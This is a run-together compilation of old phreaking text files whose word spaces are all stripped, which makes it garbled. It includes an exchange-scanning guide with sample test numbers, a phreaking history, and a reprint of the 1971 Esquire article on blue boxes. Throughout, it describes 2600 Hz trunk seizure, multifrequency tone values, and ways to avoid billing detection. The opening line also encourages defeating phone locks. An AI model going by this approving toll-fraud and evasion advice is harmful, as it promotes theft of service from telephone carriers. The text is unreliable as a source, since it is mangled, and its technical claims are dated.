Finally,rememberthatyouhavejustasmuchrighttothatphoneasthe assholewhoputthelockonit! 148.ExchangeScanningbyTheJollyRoger Almosteveryexchangeinthebellsystemhastest#'sandother"goodies"such asloopswithdialups.These"goodies"areusuallyfoundbetween9900and9999 inyourlocalexchange.Ifyouhavethetimeandinitiative,scanyourexchange andyoumaybecomelucky! Herearesomefindingsinthe914268exchange: 9900ANI 9901ANI 9927OSC.TONE(POSSIBLETONESIDEOFALOOP) 9936VOICE#TOTHETELCOCENTRALOFFICE 9937VOICE#TOTHETELCOCENTRALOFFICE 9941COMPUTER(DIGITALVOICETRANSMISSION?) 9960OSC.TONE(TONESIDELOOP)MAYALSOBEACOMPUTERINSOMEEXCHANGES 9961NORESPONSE(OTHERENDOFLOOP?) 9962NORESPONSE(OTHERENDOFLOOP?) 9963NORESPONSE(OTHERENDOFLOOP?) 9966COMPUTER(SEE9941) 9968TONETHATDISAPPEARSRESPONDSTOCERTAINTOUCHTONEKEYS Mostofthenumbersbetween9900&9999willringorgotoa"what#,please?" operator. 149.AShortHistoryofPhreakingbyTheJollyRoger Wellnowweknowalittlevocabulary,andnowitsintohistory,Phreak history.BackatMITin1964arrivedastudentbythenameofStewartNelson, whowasextremelyinterestedinthetelephone.BeforeenteringMIT,hehadbuilt autodialers,cheeseboxes,andmanymoregadgets.ButwhenhecametoMIThe becameevenmoreinterestedin"fonehacking"astheycalledit.Afteralittle whilehenaturallystartedusingthePDP1,theschoolscomputeratthattime, andfromtherehedecidedthatitwouldbeinterestingtoseewhetherthe computercouldgeneratethefrequenciesrequiredforblueboxing.Thehackersat MITwerenotinterestedinrippingoffMaBell,butjustexploringthetelephone network.Stew(ashewascalled)wroteaprogramtogenerateallthetonesand setoffintothevastnetwork. NowthereweremorepeoplephreakingthantheonesatMIT.Mostpeoplehave heardofCaptainCrunch(Nonotthecereal),healsodiscoveredhowtotake ridesthroughthefonesystem,withtheaidofasmallwhistlefoundinacereal box(canweguesswhichone?).Byblowingthiswhistle,hegeneratedthemagical 2600hzandintothemouthpieceitsailed,givinghimcompletecontroloverthe system.Ihaveheardrumorsthatatonetimehemadeaboutofthecallscoming outofSanFrancisco.Hegotfamousfast.Hemadethecoverofpeoplemagazine andwasinterviewedseveraltimes(asyou'llsoonsee).Wellhefinallygot caughtafteralongadventurouscareer.Afterhewascaughthewasputinjail andwasbeatenupquitebadlybecausehewouldnotteachotherinmateshowto boxcalls.Aftergettingout,hejoinedApplecomputerandisstilloutthere somewhere. ThentherewasJoetheWhistler,blindformthedayhewasborn.Hecould whistleaperfect2600hztone.Itwasrumoredphreaksusedtocallhimtotune theirboxes. Wellthatwasuptoabout1970,thenfrom1970to1979,phreakingwasmainly

donebycollegestudents,businessmenandanyonewhoknewenoughabout electronicsandthefonecompanytomakea555Ictogeneratethosemagictones. Businessmenandafewcollegestudentsmainlyjustblueboxtogetfreecalls. Theotherswerestillthere,exploring800#'sandthenewESSsystems.ESSposed abigproblemforphreaksthenandevenabiggeronenow.ESSwasnot widespread,butwhereitwas,blueboxingwasnexttoimpossibleexceptforthe mostexperiencedphreak.TodayESSisinstalledinalmostallmajorcitiesand blueboxingisgettingharderandharder. 1978markedachangeinphreaking,theApple][,nowacomputerthatwas affordable,couldbeprogrammed,andcouldsaveallthatpreciousworkona cassette.ThenjustashortwhilelatercametheAppleCatmodem.Withthis modem,generatingallblueboxtoneswaseasyaswritingaprogramtocountform onetoten(alittleexaggerated).Prettysoonprogramsthatcouldimitatean operatorjustasgoodastherealthingwerehittingthecommunity,TSPSand Cat'sMeow,arethestandardnowandarethebest. 19821986:LDserviceswerestartingtoappearinmassnumbers.Peoplenowhad programstohackLDservices,telephoneexchanges,andevenpasswords.Bynow manyphreaksweregettingextremelygoodandBBS'sstartedtospringup everywhere,eachhavingmanydocumentationsonphreakingforthenovice.Thenit happened,themovieWarGameswasreleasedandmassnumbersofsixthgradeto allagesflockedtoseeit.Theproblemwasn'tthatthemoviewasbad,itwas thatnowEVERYONEwantedtobeahacker/phreak.Novicescameoutinsuchmass numbers,thatbulletinboardsstartedtobebusy24hoursaday.Tothisday, theystillhavenotrecovered.Otherproblemsstartedtooccur,novicesguessed easypasswordsonlargegovernmentcomputersandstartedtoplayaround...Well itwasn'tlongbeforetheywerecaught,Ithinkthatmanypeoplerememberthe 414hackers.Theyweresostupidastosay"yes"whenthecomputeraskedthem whetherthey'dliketoplaygames.Wellatleastittakestheheatoffthereal phreaks/hacker/crackers. 150."SecretsoftheLittleBlueBox"byRonRosenbaum Dudes...Thesefourfilescontainthestory,"SecretsoftheLittleBlueBox". Astorysoincredibleitmayevenmakeyoufeelsorryforthephonecompany PrintedintheOctober1971issueofEsquireMagazine.Ifyouhappentobeina libraryandcomeacrossacollectionofEsquiremagazines,theOctober1971 issueisthefirstissueprintedinthesmallerformat.Thestorybeginsonpage 116withapictureofabluebox. OneFaradCap,AtlanticAnarchistGuild TheBlueBoxIsIntroduced:ItsQualitiesAreRemarkedIamintheexpensively furnishedlivingroomofAlGilbertson(Hisrealnamehasbeenchanged.),the creatorofthe"bluebox."Gilbertsonisholdingoneofhisshinyblackand silver"blueboxes"comfortablyinthepalmofhishand,pointingoutthe thirteenlittleredpushbuttonsstickingupfromtheconsole.Heisdancinghis fingersoverthebuttons,tappingoutdiscordantbeepingelectronicjingles.He istryingtoexplaintomehowhislittleblueboxdoesnothinglessthanplace theentiretelephonesystemoftheworld,satellites,cablesandall,atthe serviceoftheblueboxoperator,freeofcharge. "That'swhatitdoes.Essentiallyitgivesyouthepowerofasuperoperator. Youseizeatandemwiththistopbutton,"hepressesthetopbuttonwithhis indexfingerandtheblueboxemitsahighpitchedcheep,"andlikethat" cheepgoestheblueboxagain"youcontrolthephonecompany'slongdistance switchingsystemsfromyourcutelittlePrincesphoneoranyoldpayphone.And you'vegotanonymity.Anoperatorhastooperatefromadefinitelocation:the

phonecompanyknowswheresheisandwhatshe'sdoing.Butwithyourbeeperbox, onceyouhopontoatrunk,sayfromaHolidayInn800(tollfree)number,they don'tknowwhereyouare,orwhereyou'recomingfrom,theydon'tknowhowyou slippedintotheirlinesandpoppedupinthat800number.Theydon'tevenknow anythingillegalisgoingon.Andyoucanobscureyouroriginsthroughasmany levelsasyoulike.YoucancallnextdoorbywayofWhitePlains,thenoverto Liverpoolbycable,andthenbackherebysatellite.Youcancallyourselffrom onepayphoneallthewayaroundtheworldtoapayphonenexttoyou.Andyou getyourdimebacktoo." "Andtheycan'ttracethecalls?Theycan'tchargeyou?""Notifyoudoitthe rightway.Butyou'llfindthatthefreecallthingisn'treallyasexcitingat firstasthefeelingofpoweryougetfromhavingoneofthesebabiesinyour hand.I'vewatchedpeoplewhentheyfirstgetholdofoneofthesethingsand startusingit,anddiscovertheycanmakeconnections,setupcrisscrossand zigzagswitchingpatternsbackandforthacrosstheworld.Theyhardlytalkto thepeopletheyfinallyreach.Theysayhelloandstartthinkingofwhatkindof calltomakenext.Theygoalittlecrazy."Helooksdownattheneatlittle packageinhispalm.Hisfingersarestilldancing,tappingoutbeeperpatterns. "Ithinkit'ssomethingtodowithhowsmallmymodelsare.Therearelotsof blueboxesaround,butminearethesmallestandmostsophisticated electronically.IwishIcouldshowyoutheprototypewemadeforourbig syndicateorder." Hesighs."Wehadthisorderforathousandbeeperboxesfromasyndicatefront maninLasVegas.Theyusethemtoplacebetscoasttocoast,keeplinesopen forhours,allofwhichcangetexpensiveifyouhavetopay.Thedealwasa thousandblueboxesfor$300apiece.Beforethenweretailedthemfor$1500 apiece,but$300,000inonelumpwashardtoturndown.Wehadamanufacturing dealworkedoutinthePhilippines.Everythingreadytogo.Anyway,themodelI hadreadyforlimitedmassproductionwassmallenoughtofitinsideafliptop Marlborobox.Ithadflushtouchpanelsforakeyboard,ratherthanthese unsightlybuttons,stickingout.Lookedjustlikeatinyportableradio.In fact,IhaddesigneditwithatinytransistorreceivertogetoneAMchannel, soincasethelawbecamesuspicioustheownercouldswitchontheradiopart, startsnappinghisfingers,andnoonecouldtellanythingillegalwasgoingon. IthoughtofeverythingforthismodelIhaditlinedwithabandofthermite whichcouldbeignitedbyradiosignalfromatinybuttontransmitteronyour belt,soitcouldbeburnedtoashesinstantlyincaseofabust.Itwas beautiful.Abeautifullittlemachine.Youshouldveseenthefacesonthese syndicateguyswhentheycamebackaftertryingitout.They'dholditintheir palmliketheyneverwantedtoletitgo,andthey'dsay,'Ican'tbelieveit. Ican'tbelieveit.'Youprobablywon'tbelieveituntilyoutryit." TheBlueBoxIsTested:CertainConnectionsAreMade Abouteleveno'clocktwonightslaterFraserLuceyhasablueboxinthepalmof hislefthandandaphoneinthepalmofhisright.Heisstandinginsidea phoneboothnexttoanisolatedshutdownmoteloffHighway1.Iamstanding outsidethephonebooth. Fraserlikestoshowoffhisblueboxforpeople.Untilafewweeksagowhen PacificTelephonemadeafewarrestsinhiscity,FraserLuceylikedtobring hisbluebox(Thisparticularbluebox,likemostblueboxes,isnotblue.Blue boxeshavecometobecalled"blueboxes"eitherbecause1)Thefirstbluebox everconfiscatedbyphonecompanysecuritymenhappenedtobeblue,or2)To distinguishthemfrom"blackboxes."Blackboxesaredevices,usuallyaresistor inseries,which,whenattachedtohomephones,allowallincomingcallstobe madewithoutchargetoone'scaller.)toparties.Itneverfailed:Afewcheeps fromhisdeviceandFraserbecamethecenterofattentionattheveryhippestof gatherings,playingphonetricksanddoingrequestnumbersforhours.Hebegan

totakeordersforhismanufacturerinMexico.Hebecameadealer. Fraseriscautiousnowaboutwhereheshowsoffhisbluebox.Buthenevergets tiredofplayingwithit."It'slikethefirsttimeeverytime,"hetellsme. Fraserputsadimeintheslot.Helistensforatoneandholdsthereceiverup tomyear.Ihearthetone.Fraserbeginsdescribing,withacertainpracticed air,whathedoeswhilehedoesit."I'mdialingan800numbernow.Any800 numberwilldo.It'stollfree.TonightIthinkI'llusethe(henamesa wellknowrentacarcompany)800number.Listen,It'sringing.Here,youhear it?Nowwatch."Heplacestheblueboxoverthemouthpieceofthephonesothat theonesilverandtwelveblackpushbuttonsarefacinguptowardme.Hepresses thesilverbuttontheoneatthetopandIhearthathighpitchedbeep. "That's2600cyclespersecondtobeexact,"saysLucey."Now,quick.Listen." Heshovestheearpieceatme.Theringinghasvanished.Thelinegivesaslight hiccough,thereisasharpbuzz,andthennothingbutsoftwhitenoise. "We'rehomefreenow,"Luceytellsme,takingbackthephoneandapplyingthe blueboxtoitsmouthpieceonceagain."We'reuponatandem,intoalonglines trunk.Onceyou'reuponatandem,youcansendyourselfanywhereyouwantto go."HedecidestocheckoutLondonfirst.Hechoosesacertainpayphone locatedinWaterlooStation.Thisparticularpayphoneispopularwiththe phonephreaksnetworkbecausethereareusuallypeoplewalkingbyatallhours whowillpickitupandtalkforawhile. Hepressesthelowerlefthandcornerbuttonwhichismarked"KP"onthefaceof thebox."That'sKeyPulse.Ittellsthetandemwe'rereadytogiveit instructions.FirstI'llpunchoutKP182START,whichwillslideusintothe overseassenderinWhitePlains."Ihearaneatclunkcheep."Ithinkwe'll headovertoEnglandbysatellite.Cableisactuallyfasterandtheconnection issomewhatbetter,butIlikegoingbysatellite.SoIjustpunchoutKPZero 44.TheZeroissupposedtoguaranteeasatelliteconnectionand44isthe countrycodeforEngland.Okay...we'rethere.InLiverpoolactually.NowallI havetodoispunchouttheLondonareacodewhichis1,anddialupthepay phone.Here,listen,I'vegotaringnow." IhearthesoftquickpurrpurrofaLondonring.Thensomeonepicksupthe phone. "Hello,"saystheLondonvoice. "Hello.Who'sthis?"Fraserasks. "Hello.There'sactuallynobodyhere.IjustpickedthisupwhileIwaspassing by.Thisisapublicphone.There'snooneheretoansweractually." "Hello.Don'thangup.I'mcallingfromtheUnitedStates." "Oh.Whatisthepurposeofthecall?Thisisapublicphoneyouknow." "Oh.Youknow.Tocheckout,uh,tofindoutwhat'sgoingoninLondon.Howis itthere?" "Itsfiveo'clockinthemorning.It'srainingnow." "Oh.Whoareyou?" TheLondonpasserbyturnsouttobeanR.A.F.enlisteeonhiswaybacktothe baseinLincolnshire,withaterriblehangoverafterathirtysixhourpass.He andFrasertalkabouttherain.Theyagreethatit'snicerwhenit'snot raining.TheysaygoodbyeandFraserhangsup.Hisdimereturnswithanice clink.

"Isn'tthatfarout,"hesaysgrinningatme."London,likethat." Frasersqueezesthelittleblueboxaffectionatelyinhispalm."Itoldyathis thingisforreal.Listen,ifyoudon'tmindI'mgonnatrythisgirlIknowin Paris.Iusuallygiveheracallaroundthistime.Itfreaksherout.Thistime I'llusethe(adifferentrentacarcompany)800numberandwe'llgoby overseascable,133;33isthecountrycodeforFrance,the1sendsyouby cable.Okay,herewego....Ohdamn.Busy.Whocouldshebetalkingtoatthis time?" Astatepolicecarcruisesslowlybythemotel.Thecardoesnotstop,but Frasergetsnervous.Wehopbackintohiscaranddrivetenmilesinthe oppositedirectionuntilwereachaTexacostationlockedupforthenight.We pulluptoaphoneboothbythetirepump.Fraserdashesinsideandtriesthe Parisnumber.Itisbusyagain. "Idon'tunderstandwhoshecouldbetalkingto.Thecircuitsmaybebusy.It's toobadIhaven'tlearnedhowtotapintolinesoverseaswiththisthingyet." Fraserbeginstophreakaround,asthephonephreakssay.Hedialsaleading nationwidechargecard's800numberandpunchesoutthetonesthatbringhimthe timerecordinginSydney,Australia.HebeepsuptheweatherrecordinginRome, inItalianofcourse.HecallsafriendinBostonandtalksaboutacertain overthecounterstocktheyareintoheavily.HefindstheParisnumberbusy again.Hecallsup"DialaDisc"inLondon,andwelistentoDoubleBarrelby DavidandAnsilCollins,thenumberonehitoftheweekinLondon.Hecallsupa dealerofanothersortandtalksincode.HecallsupJoeEngressia,the originalblindphonephreakgenius,andpayshisrespects.Thereareother calls.FinallyFrasergetsthroughtohisyoungladyinParis. Theybothagreethecircuitsmusthavebeenbusy,andcriticizetheParis telephonesystem.AttwothirtyinthemorningFraserhangsup,pocketshis dime,anddrivesoff,steeringwithonehand,holdingwhathecallshis"lovely littlebluebox"intheother. YouCanCallLongDistanceForLessThanYouThink "Yousee,afewyearsagothephonecompanymadeonebigmistake,"Gilbertson explainstwodayslaterinhisapartment."Theywerecarelessenoughtoletsome technicaljournalpublishtheactualfrequenciesusedtocreatealltheirmulti frequencytones.JustatheoreticalarticlesomeBellTelephoneLaboratories engineerwasdoingaboutswitchingtheory,andhelistedthetonesinpassing. At(awellknowntechnicalschool)Ihadbeenfoolingaroundwithphones forseveralyearsbeforeIcameacrossacopyofthejournalintheengineering library.IranbacktothelabandittookmaybetwelvehoursfromthetimeI sawthatarticletoputtogetherthefirstworkingbluebox.Itwasbiggerand clumsierthanthislittlebaby,butitworked." It'sallthereonpublicrecordinthattechnicaljournalwrittenmainlybyBell Labpeopleforothertelephoneengineers.Oratleastitwaspublic."Justtry andgetacopyofthatissueatsomeengineeringschoollibrarynow. Bellhashadthemallredtaggedandwithdrawnfromcirculation,"Gilbertson tellsme. "Butit'stoolate.It'sallpublicnow.Andoncetheybecamepublicthe technologyneededtocreateyourownbeeperdeviceiswithintherangeofany twelveyearoldkid,anytwelveyearoldblindkidasamatteroffact.Andhe candoitinlessthanthetwelvehoursittookus.Blindkidsdoitallthe time.Theycan'tbuildanythingaspreciseandcompactasmybeeperbox,but theirscandoanythingminecando."

"How?" "Okay.AbouttwentyyearsagoAT&T.madeamultibilliondollardecisionto operateitsentirelongdistanceswitchingsystemontwelveelectronically generatedcombinationsoftwelvemastertones.Thosearethetonesyousometimes hearinthebackgroundafteryou'vedialedalongdistancenumber.Theydecided tousesomeverysimpletonesthetoneforeachnumberisjusttwofixed singlefrequencytonesplayedsimultaneouslytocreateacertainbeatfrequency. Like1300cyclespersecondand900cyclespersecondplayedtogethergiveyou thetonefordigit5.Now,whatsomeofthesephonephreakshavedoneisget themselvesaccesstoanelectricorgan.Anycheapfamilyhomeentertainment organ.Sincethefrequenciesarepublicknowledgenowoneblindphonephreak hasevenhadthemrecordedinoneofthetalkingbooksfortheblindthey justhavetofindthemusicalnotesontheorganwhichcorrespondtothephone tones.Thentheytapethem.Forinstance,togetMaBell'stoneforthenumber 1,youpressdownorgankeysF~5andA~5(900and700cyclespersecond)atthe sametime.Toproducethetonefor2it'sF~5andC~6(1100and700cps).The phonephreakscirculatethewholelistofnotessothere'snotrialanderror anymore." Heshowsmealistoftherestofthephonenumbersandthetwoelectricorgan keysthatproducethem. "Actually,youhavetorecordthesenotesat33/4inchespersecondtapespeed anddoubleitto7inchespersecondwhenyouplaythemback,togetthe propertones,"headds. "Soonceyouhaveallthetonesrecorded,howdoyouplugthemintothephone system?" "Well,theytaketheirorganandtheircassetterecorder,andstartbangingout entirephonenumbersintonesontheorgan,includingcountrycodes,routing instructions,'KP'and'Start'tones.Or,iftheydon'thaveanorgan,someone inthephonephreaknetworksendsthemacassettewithallthetonesrecorded, withavoicesaying'Numberone,'thenyouhavethetone,'Numbertwo,'thenthe toneandsoon.Sowithtwocassetterecorderstheycanputtogetheraseriesof phonenumbersbyswitchingbackandforthfromnumbertonumber.Anyidiotin thecountrywithacheapcassetterecordercanmakeallthefreecallshe wants." "Youmeanyoujustholdthecassetterecorderupthemouthpieceandswitchina seriesofbeepsyou'verecorded?Thephonethinksthatanythingthatmakesthese tonesmustbeitsownequipment?" "Right.Aslongasyougetthefrequencywithinthirtycyclespersecondofthe phonecompany'stones,thephoneequipmentthinksithearsitsownvoicetalking toit.Theoriginalgranddaddyphonephreakwasthisblindkidwithperfect pitch,JoeEngressia,whousedtowhistleintothephone.Anoperatorcouldtell thedifferencebetweenhiswhistleandthephonecompany'selectronictone generator,butthephonecompany'sswitchingcircuitcan'ttellthemapart.The biggerthephonecompanygetsandthefurtherawayfromhumanoperatorsitgets, themorevulnerableitbecomestoallsortsofphonephreaking." AGuideforthePerplexed "Butwaitaminute,"IstopGilbertson."Ifeverythingyoudosoundslikephone companyequipment,whydoesn'tthephonecompanychargeyouforthecalltheway itchargesitsownequipment?" "Okay.That'swherethe2600cycletonecomesin.Ibetterstartfromthe beginning."

Thebeginninghedescribesformeisavisionofthephonesystemofthe continentasthousandsofwebs,oflonglinetrunksradiatingfromeachofthe hundredsoftollswitchingofficestotheothertollswitchingoffices.Each tollswitchingofficeisahivecompactedofthousandsoflongdistancetandems constantlywhistlingandbeepingtotandemsinfarofftollswitchingoffices. Thetandemisthekeytothewholesystem.Eachtandemisalinewithsome relayswiththecapabilityofsignalinganyothertandeminanyothertoll switchingofficeonthecontinent,eitherdirectlyonetooneorbyprogramming aroundaboutroutethroughseveralothertandemsifallthedirectroutesare busy.Forinstance,ifyouwanttocallfromNewYorktoLosAngelesandtraffic isheavyonalldirecttrunksbetweenthetwocities,yourtandeminNewYorkis programmedtotrythenextbestroute,whichmaysendyoudowntoatandemin NewOrleans,thenuptoSanFrancisco,ordowntoaNewOrleanstandem,backto anAtlantatandem,overtoanAlbuquerquetandemandfinallyuptoLosAngeles. Whenatandemisnotbeingused,whenit'ssittingtherewaitingforsomeoneto makealongdistancecall,itwhistles.Onesideofthetandem,theside "facing"yourhomephone,whistlesat2600cyclespersecondtowardallthehome phonesservicedbytheexchange,tellingthemitisattheirservice,should theybeinterestedinmakingalongdistancecall.Theothersideofthetandem iswhistling2600cps.intooneormorelongdistancetrunklines,tellingthe restofthephonesystemthatitisneithersendingnorreceivingacallthrough thattrunkatthemoment,thatithasnouseforthattrunkatthemoment. "Whenyoudialalongdistancenumberthefirstthingthathappensisthatyou arehookedintoatandem.Aregistercomesuptothesideofthetandemfacing awayfromyouandpresentsthatsidewiththenumberyoudialed.Thissending sideofthetandemstopswhistling2600intoitstrunkline.Whenatandemstops the2600toneithasbeensendingthroughatrunk,thetrunkissaidtobe "seized,"andisnowreadytocarrythenumberyouhavedialedconvertedinto multifrequencybeeptonestoatandemintheareacodeandcentraloffice youwant. NowwhenablueboxoperatorwantstomakeacallfromNewOrleanstoNewYork hestartsbydialingthe800numberofacompanywhichmighthappentohaveits headquartersinLosAngeles.ThesendingsideoftheNewOrleanstandemstops sending2600outoverthetrunktothecentralofficeinLosAngeles,thereby seizingthetrunk.YourNewOrleanstandembeginssendingbeeptonestoatandem ithasdiscoveredidlywhistling2600cyclesinLosAngeles.Thereceivingend ofthatLAtandemisseized,stopswhistling2600,listenstothebeeptones whichtellitwhichLAphonetoring,andstartsringingthe800number. MeanwhileamarkmadeintheNewOrleansofficeaccountingtapenotesthata callfromyourNewOrleansphonetothe800numberinLAhasbeeninitiatedand givesthecallacodenumber.Everythingisroutinesofar. Butthenthephonephreakpresseshisblueboxtothemouthpieceandpushesthe 2600cyclebutton,sending2600outfromtheNewOrleanstandemtotheLA tandem.TheLAtandemnotices2600cyclesarecomingoverthelineagainand assumesthatNewOrleanshashungupbecausethetrunkiswhistlingasifidle. TheLAtandemimmediatelyceasesringingtheLA800number.Butassoonasthe phreaktakeshisfingeroffthe2600button,theLAtandemassumesthetrunkis onceagainbeingusedbecausethe2600isgone,soitlistensforanewseries ofdigittonestofindoutwhereitmustsendthecall. ThustheblueboxoperatorinNewOrleansnowisintouchwithatandeminLA whichiswaitinglikeanobedientgenietobetoldwhattodonext.Thebluebox ownerthenbeepsoutthetendigitsoftheNewYorknumberwhichtelltheLA tandemtorelayacalltoNewYorkCity.Whichitpromptlydoes.Assoonasyour partypicksupthephoneinNewYork,thesideoftheNewOrleanstandemfacing youstopssending2600cyclestoyouandstartscarryinghisvoicetoyoubyway

oftheLAtandem.Anotationismadeontheaccountingtapethattheconnection hasbeenmadeonthe800callwhichhadbeeninitiatedandnotedearlier.When youstoptalkingtoNewYorkanotationismadethatthe800callhasended. Atthreethenextmorning,whenthephonecompany'saccountingcomputerstarts readingbackoverthemasteraccountingtapeforthepastday,itrecordsthata callofacertainlengthoftimewasmadefromyourNewOrleanshometoanLA 800numberand,ofcourse,theaccountingcomputerhasbeentrainedtoignore thosetollfree800callswhencompilingyourmonthlybill. "Alltheycanproveisthatyoumadean800tollfreecall,"Gilbertsonthe inventorconcludes."Ofcourse,ifyou'refoolishenoughtotalkfortwohours onan800call,andthey'veinstalledoneoftheirspecialantifraudcomputer programstowatchoutforsuchthings,theymayspotyouandaskwhyyoutook twohourstalkingtoArmyRecruiting's800numberwhenyou're4F. Butifyoudoitfromapayphone,theymaydiscoversomethingpeculiarthenext dayifthey'vegotablueboxhuntingprogramintheircomputerbutyou'll bealongtimegonefromthepayphonebythen.Usingapayphoneisalmost guaranteedsafe." "WhatabouttherecentseriesofblueboxarrestsallacrossthecountryNew York,Cleveland,andsoon?"Iasked."Howweretheycaughtsoeasily?" "FromwhatIcantell,theymadeonebigmistake:theywereseizingtrunksusing anareacodeplus5551212insteadofan800number.Using555iseasytodetect becausewhenyousendmultifrequencybeeptonesof555yougetachargeforit onyourtapeandtheaccountingcomputerknowsthere'ssomethingwrongwhenit triestobillyouforatwohourcalltoAkron,Ohio,information,anditdrops atroublecardwhichgoesrightintothehandsofthesecurityagentifthey're lookingforblueboxuser. "Whoeversoldthoseguystheirblueboxesdidn'ttellthemhowtousethem properly,whichisfairlyirresponsible.Andtheywerefairlystupidtousethem athomeallthetime. "Butwhatthosearrestsreallymeanisthananawfullotofblueboxesare floodingintothecountryandthatpeoplearefindingthemsoeasytomakethat theyknowhowtomakethembeforetheyknowhowtousethem.MaBellisin trouble." Andifablueboxoperatororacassetterecorderphonephreakstickstopay phonesand800numbers,thephonecompanycan'tstopthem? "Notunlesstheychangetheirentirenationwidelonglinestechnology,which willtakethemafewbilliondollarsandtwentyyears.Rightnowtheycan'tdoa thing.They'rescrewed." CaptainCrunchDemonstratesHisFamousUnit Thereisanundergroundtelephonenetworkinthiscountry.Gilbertsondiscovered ittheverydaynewsofhisactivitieshitthepapers.Thateveninghisphone beganringing.PhonephreaksfromSeattle,fromFlorida,fromNewYork,fromSan Jose,andfromLosAngelesbegancallinghimandtellinghimaboutthephone phreaknetwork.He'dgetacallfromaphonephreakwho'dsaynothingbut,"Hang upandcallthisnumber." Whenhedialedthenumberhe'dfindhimselftiedintoaconferenceofadozen phonephreaksarrangedthroughaquirkyswitchingstationinBritishColumbia. Theyidentifiedthemselvesasphonephreaks,theydemonstratedtheirhomemade blueboxeswhichtheycalled"MFers"(for"multifrequency,"amongother things)forhim,theytalkedshopaboutphonephreakdevices.Theylethiminon

theirsecretsonthetheorythatifthephonecompanywasafterhimhemustbe trustworthy.And,Gilbertsonrecalls,theystunnedhimwiththeirtechnical sophistication. Iaskhimhowtogetintouchwiththephonephreaknetwork.Hedigsaround throughafileofoldschematicsandcomesupwithaboutadozennumbersin threewidelyseparatedareacodes. "Thosearethecenters,"hetellsme.Alongsidesomeofthenumbershewritesin firstnamesornicknames:nameslikeCaptainCrunch,Dr.No,FrankCarson(also acodewordforafreecall),MartyFreeman(codewordforMFdevice),Peter PerpendicularPimple,Alefnull,andTheCheshireCat.Hemakeschecksalongside thenamesofthoseamongthesetoptwelvewhoareblind.Therearefivechecks. IaskhimwhothisCaptainCrunchpersonis. "Oh.TheCaptain.He'sprobablythemostlegendaryphonephreak.Hecalls himselfCaptainCrunchafterthenotoriousCap'nCrunch2600whistle."(Several yearsago,Gilbertsonexplains,themakersofCap'nCrunchbreakfastcereal offeredatoywhistleprizeineveryboxasatreatfortheCap'nCrunchset. Somehowaphonephreakdiscoveredthatthetoywhistlejusthappenedtoproduce aperfect2600cycletone.WhenthemanwhocallshimselfCaptainCrunchwas transferredoverseastoEnglandwithhisAirForceunit,hewouldreceivescores ofcallsfromhisfriendsand"mute"themmakethemfreeofchargetothem byblowinghisCap'nCrunchwhistleintohisend.)"CaptainCrunchisoneofthe olderphonephreaks,"Gilbertsontellsme."He'sanengineerwhooncegotina littletroubleforfoolingaroundwiththephone,buthecan'tstop.Well,the guydrivesacrosscountryinaVolkswagenvanwithanentireswitchboardanda computerizedsupersophisticatedMFerintheback.He'llpulluptoaphone boothonalonelyhighwaysomewhere,snakeacableoutofhisbus,hookitonto thephoneandsitforhours,dayssometimes,sendingcallszippingbackand forthacrossthecountry,allovertheworld...." Backatmymotel,Idialedthenumberhegavemefor"CaptainCrunch"andasked forGT,hisrealname,oratleastthenameheuseswhenhe'snot dashingintoaphoneboothbeepingoutMFtonesfasterthanaspeedingbullet andzippingphantomlikethroughthephonecompany'slongdistancelines. WhenGTansweredthephoneandItoldhimIwaspreparingastoryfor Esquireaboutphonephreaks,hebecameveryindignant. "Idon'tdothat.Idon'tdothatanymoreatall.AndifIdoit,Idoitfor onereasonandonereasononly.I'mlearningaboutasystem.Thephonecompany isaSystem.AcomputerisaSystem,doyouunderstand?IfIdowhatIdo,itis onlytoexploreasystem.Computers,systems,that'smybag.Thephonecompany isnothingbutacomputer." AtoneoftightlyrestrainedexcitemententerstheCaptain'svoicewhenhe startstalkingaboutsystems.Hebeginstopronounceeachsyllablewiththe husheddeliberationofanobscenecaller. "MaBellisasystemIwanttoexplore.It'sabeautifulsystem,youknow,but MaBellscrewedup.It'sterriblebecauseMaBellissuchabeautifulsystem, butshescrewedup.Ilearnedhowshescrewedupfromacoupleofblindkidswho wantedmetobuildadevice.Acertaindevice.Theysaiditcouldmakefree calls.Iwasn'tinterestedinfreecalls.ButwhentheseblindkidstoldmeI couldmakecallsintoacomputer,myeyeslitup.Iwantedtolearnabout computers.IwantedtolearnaboutMaBell'scomputers.SoIbuildthelittle device,butIbuiltitwrongandMaBellfoundout.MaBellcandetectthings likethat.MaBellknows.SoI'mstrictlyridofitnow.Idon'tdoit.Except forlearningpurposes."Hepauses."Soyouwanttowriteanarticle.Areyou payingforthiscall?Hangupandcallthisnumber."Hegivesmeanumberina

areacodeathousandmilesawayofhisown.Idialthenumber. "Helloagain.ThisisCaptainCrunch.Youarespeakingtomeonatollfree looparoundinPortland,Oregon.Doyouknowwhatatollfreelooparoundis? I'lltellyou." Heexplainstomethatalmosteveryexchangeinthecountryhasopentest numberswhichallowotherexchangestotesttheirconnectionswithit.Mostof thesenumbersoccurinconsecutivepairs,suchas3029560041and3029560042. Well,certainphonephreaksdiscoveredthatiftwopeoplefromanywhereinthe countrydialthetwoconsecutivenumberstheycantalktogetherjustasifone hadcalledtheother'snumber,withnochargetoeitherofthem,ofcourse. "Nowourvoiceisloopingaroundina4AswitchingmachineupthereinCanada, zippingbackdowntome,"theCaptaintellsme."Myvoiceisloopingaroundup thereandbackdowntoyou.Anditcan'tevercostanyonemoney.Thephone phreaksandIhavecompiledalistofmanyofthesenumbers.Youwouldbe surprisedifyousawthelist.Icouldshowittoyou.ButIwon't.I'moutof thatnow.I'mnotouttoscrewMaBell.Iknowbetter.IfIdoanythingit'sfor thepureknowledgeoftheSystem.Youcanlearntodofantasticthings.Haveyou everheardeighttandemsstackedup?Doyouknowthesoundoftandemsstacking andunstacking?Givemeyourphonenumber.Okay.Hangupnowandwaitaminute." SlightlylessthanaminutelaterthephonerangandtheCaptainwasonthe line,hisvoicesoundingfarmoreexcited,almostaroused. "Iwantedtoshowyouwhatit'sliketostackuptandems.Tostackuptandems." (WhenevertheCaptainsays"stackup"itsoundsasifheislickinghislips.) "Howdoyouliketheconnectionyou'reonnow?"theCaptainasksme."It'saraw tandem.Arawtandem.Ain'tnothing'uptoitbutatandem.NowI'mgoingto showyouwhatit'sliketostackup.Blowoff.Landinafarawayplace.To stackthattandemup,whipbackandforthacrossthecountryafewtimes,then shootonuptoMoscow. "Listen,"CaptainCrunchcontinues."Listen.I'vegotlinetieonmyswitchboard here,andI'mgonnaletyouhearmestackandunstacktandems.Listentothis. It'sgonnablowyourmind." FirstIhearasuperrapidfirepulsingoftheflutelikephonetones,thena pause,thenanotherpoppingburstoftones,thenanother,thenanother.Each burstisfollowedbyabeepkachinksound. "Wehavenowstackedupfourtandems,"saidCaptainCrunch,soundingsomewhat 